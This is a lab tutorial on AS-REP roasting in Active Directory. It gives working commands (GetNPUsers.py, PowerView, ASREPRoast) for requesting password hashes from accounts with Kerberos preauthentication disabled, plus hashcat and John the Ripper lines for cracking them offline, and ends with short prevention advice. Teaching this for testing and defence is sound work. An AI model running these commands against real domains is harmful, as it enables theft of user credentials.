If a user’s UserAccountControl settings have the option “Do not require Kerberos preauthentication” enabled, it means that Kerberos preauthentication is disabled for that user. In simple terms, this means that the user’s password is not required to be checked before issuing a Kerberos ticket. it is possible to grab user’s crackable AS-REP and brute-force it offline
With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forced disabled as well.
Download script :- Download
Lab Setup
This script is designed to retrieve the Ticket Granting Tickets (TGTs) for users who have the “Do not require Kerberos preauthentication” property (UF_DONT_REQUIRE_PREAUTH) set, indicating that Kerberos pre-authentication is disabled
1
2
3
python3 GetNPUsers.py crt.local/steve -dc-ip 192.168.1.109 -no-pass -req
syntax :- python3 GetNpUsers.py <domain>/user -dc-ip < domain ip > -no-pass -req
- -no-pass :-if we dont have password we can use this flag so it will skip asking password
- -req :- request for tgt ticket
In essence, the presence of the “Do not require Kerberos preauthentication” setting allows an attacker to obtain the user’s password hash, which can then be subjected to offline cracking attempts using tools like hashcat or John the Ripper.
Cracking Hash
1
hashcat -m 18200 -a 0 'hash' rockyou.txt
We have successfully cracked the password
Using Windows Host
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#Using PowerView: Enumerating accounts with Kerberos Preauth disabled
Get-DomainUser -PreauthNotRequired -Verbose | select serviceprincipalname,samaccountname
#Using ActiveDirectory module:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
#Request encrypted AS-REP for offline brute-force. Let's use ASREPRoast
Get-ASREPHash -UserName VPN1user -Verbose
#To enumerate all users with Kerberos preauth disabled and request a hash
Invoke-ASREPRoast -Verbose
## We can use John The Ripper or Hashcat to brute-force the hashes offline
hashcat -m 18200 hash rockyou.txt
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worstpass.txt C:\AD\Tools\asrephashes.txt
Preventing AS-REP Roasting
AS-REP Roasting is the technique that allows retrieving password hashes for users that have this flag set in Active Directory. Additionally, various cybersecurity and hacking tools allow cracking the TGTs harvested from Active Directory. These include Rubeus and Hashcat.
⇒ An obvious way to prevent the AS-REP Roasting attack is to audit your Active Directory environment and ensure there are no accounts configured with the “Do not require Kerberos preauthentication.”
⇒ In addition to auditing your Active Directory settings for improperly configured preauthentication, you want to make sure users are required to use strong, complex passwords.